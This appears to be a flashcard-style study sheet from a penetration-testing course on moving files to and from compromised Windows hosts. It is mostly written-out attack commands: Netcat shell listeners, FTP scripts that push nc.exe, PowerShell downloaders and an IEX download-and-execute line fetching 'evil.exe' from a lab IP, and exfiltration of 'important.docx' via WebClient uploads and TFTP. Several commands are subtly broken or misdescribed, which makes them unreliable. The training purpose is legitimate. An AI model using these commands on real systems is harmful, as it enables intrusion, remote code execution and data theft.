File Transfers

Question 1

How to install FTP server on Kali?

Answer 1

• sudo apt install pure-ftpd
• chmod +x setup-ftp.sh
• sudo ./setup-ftp.sh

Question 2

Non-interactive Shell

Answer 2

• Programs that require user input such as file transfer programs
• Lack useful features like tab completion and job control
• EX. Netcat

Question 3

How can you upgrade a Non-interactive Shell?

Answer 3

• Connect to a Netcat shell
• • nc -nvlp 10.11.0.128 4444
• Create a pseudo-terminal with Python module ‘pty’
• • python -c ‘import pty; pty.spawn(“/bin/bash”)’

Question 4

Windows Non-Interactive FTP Download?

Answer 4

• Windows systems ship with a default FTP client that can be used for file transfers

Question 5

Where is the Windows binary nc.exe located on Kali?

Answer 5

/usr/share/windows-resources/binaries/nc.exe

Question 6

How do you build a text file of FTP commands that will connect a Windows machine to a Linux FTP server?

Answer 6

c: > – echo open 10.11.0.4 21 > ftp.txt
c: > – echo USER offsec&raquo_space; ftp.txt
c: > – echo lab&raquo_space; ftp.txt
c: > – echo bin&raquo_space; ftp.txt
c: > – echo GET nc.exe&raquo_space; ftp.txt
c: > – echo bye&raquo_space; ftp.txt

Question 7

Given a text file of FTP commands named ‘ftp.txt’, what command will connect a Windows machine to a Linux FTP server?

Answer 7

C:> ftp -v -n -s:ftp.txt

• • -v = suppress any returned output
• • -n = suppress automatic login
• • -s = indicate the name of command file

Question 8

How to transfer Netcat to a Windows machine from a Linux machine?

Answer 8

1. copy nc.exe to /ftphome/
   kali: ~$ – sudo cp /usr/share/windows-resources/binaries/nc.exe /ftphome/
2. start the pure-ftpd server
   kali: ~$ – sudo systemctl start pure-ftpd
3. Build a text file of FTP commands we wish to execute
   - —————————
   c: > – echo open 10.11.0.4 21 > ftp.txt
   c: > – echo USER offsec&raquo_space; ftp.txt
   c: > – echo lab&raquo_space; ftp.txt
   c: > – echo bin&raquo_space; ftp.txt
   c: > – echo GET nc.exe&raquo_space; ftp.txt
   c: > – echo bye&raquo_space; ftp.txt
   - —————————-
4. initiate the FTP session
   - - c:> ftp -v -n -s:ftp.txt

Question 9

What scripting languages can be used in each version of Windows for Downloads?

Answer 9

• Windows XP = VBScript
• Windows 2003 = VBScript
• Windos 7 and above = PowerShell

Question 10

How do you write a PowerShell downloader script?

Answer 10

C:> echo $webclient = New-Object System.Net.WebClient&raquo_space; wget.ps1
C:> echo $url = “http://10.11.0.4/evil.exe”&raquo_space; wget.ps1
C:> echo $file = “new-exploit.exe”&raquo_space; wget.ps1
C:> echo $webclient.DownloadFile($url,$file)&raquo_space; wget.ps1

Question 11

How do we run the PowerShell downloader script file wget.ps1?

Answer 11

C:> powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Question 12

How do you download and save a file evil.exe from a Linux machine with IP Address 10.11.0.4 using PowerShell?

Answer 12

C:> powershell (New-Object System.Net.WebClient).DownloadFile (‘http://10.11.0.4/evil.exe’, ‘new-exploit.exe’)

Question 13

How do you download (WITHOUT saving) and execute the evil.exe from a Linux machine with IP Address 10.11.0.4 using PowerShell?

Answer 13

C:> powershell IEX (New-Object Sytem.Net.WebClient) DownloadString(‘http://10.11.0.4/evil.exe’)

Question 14

Get nc.exe onto a Windows machine with exe2hex?

Answer 14

1. Find nc.exe for Windows
   - - kali:~$ locate nc.exe | grep binaries
2. Copy nc.exe to PWD
   - - kali:~$ cp /usr/share/windows-resources/binaries/nc.exe .
3. Compress nc.exe
   - - kali:~$ upx -9 nc.exe
4. Convert nc.exe to a Windows Script
   - - kali:~$ exe2hex -x nc.exe -p nc.cmd
5. Transfer nc.cmd to Windows machine
6. Run nc.cmd

Question 15

If HTTP traffic is allowed on a Windows machine, what can be used to exfiltrate data?

Answer 15

System.Net.WebClient PowerShell class

Question 16

What must be created on the Kali machine to process incoming file upload requests?

Answer 16

• Create the following PHP script and save it as ‘upload.php’ in our Kali webroot directory, /var/www/html:

Question 17

What is the process for uploading a file from a Windows machine to our Kali machine via the uploads.php script?

Answer 17

1. Create uploads.php in /var/www/html
2. Make directory /var/www/uploads
3. Make sure Apache2 is running
   - - ps -ef | grep apache
4. Modify /var/www/uploads permission, granting ‘www-data’ user ownership and write permissions’
   - - sudo chown www-data: /var/www/uploads
5. Upload the file from Windows machine
   - - C:> powershell (New-Object System.Net.WebClient)UploadFile (‘http://10.0.2.15/upload.php’, ‘important.docx’)

Question 18

What is an alternative file transfer tool for older Windows systems that do not have PowerShell?

Answer 18

TFTP

Question 19

How do we install and configure TFTP on our Kali machine?

Answer 19

• • sudo apt install atftp
• • sudo mkdir /tftp
• • sudo chown nobody: /tftp
• • sudo atftpd –daemon –port 69 /tftp

Question 20

How do we upload a file from a Windows machine to Kali over TFTP?

Answer 20

– c:> tftp -i 10.11.0.4 put important.docx